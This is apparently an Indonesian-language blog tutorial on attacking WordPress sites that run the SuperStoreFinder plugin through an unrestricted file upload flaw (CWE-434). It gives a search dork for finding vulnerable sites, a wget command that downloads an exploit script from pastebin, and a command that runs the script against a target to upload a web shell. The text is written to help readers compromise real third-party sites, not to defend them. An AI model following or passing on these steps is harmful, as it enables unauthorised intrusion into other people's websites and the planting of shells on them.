Hallo kawan kawan ketemu lagi bersama saya.. oke pada pertemuan kali ini kita akan membahas poc yang sangat bumming yang terbilang baru ini :D yaitu CWE-434 oke bagaimana kelanjutan dan cara meng exploitasi website wordpress dengan memanfaatkan kerentanan ini?
Exploitasi
awal awal yang kalian harus lakukan yaitu mencari site yang sekiranya lemah menggunakan dork? apa dorknya mas?...
Dork : SuperStoreFinder
Sebelum mengeksekusi Site kita akan mendownload tools nya terlebih dauhlu saya akan membakian source code dibawah ini ...
kalian install di termux atau terminal dengan command
wget https://pastebin.com/raw/pMuFWLLm -O exploit.py
Berhubungan ini tools menggunakan bahasa python maka kita akan memberikan format .py yang wajib digunakan disetipan file python
oke sekarang kita mulai exploitasi dengan menggunakan python2
python2 exploit.py https://target.com/
Disini kita hanya memasukan site target tanpa path , karna path sudah otomatis ter detect di dalam tools nya secara default , maka dari itu kalian hanya memasukan site targetnya saja ...
seperti yang terlihat di gambar di atas kalian pilih opsi nomor 1 karna yg kita targetkan yaitu bug superstorefinder-wp nya :)
dan jika vuln / ter upload shel nya akan seperti ini ... contoh gambar dibawah
Thanks To S4ndal.py
Check Via Video Youtube Dark Clown Security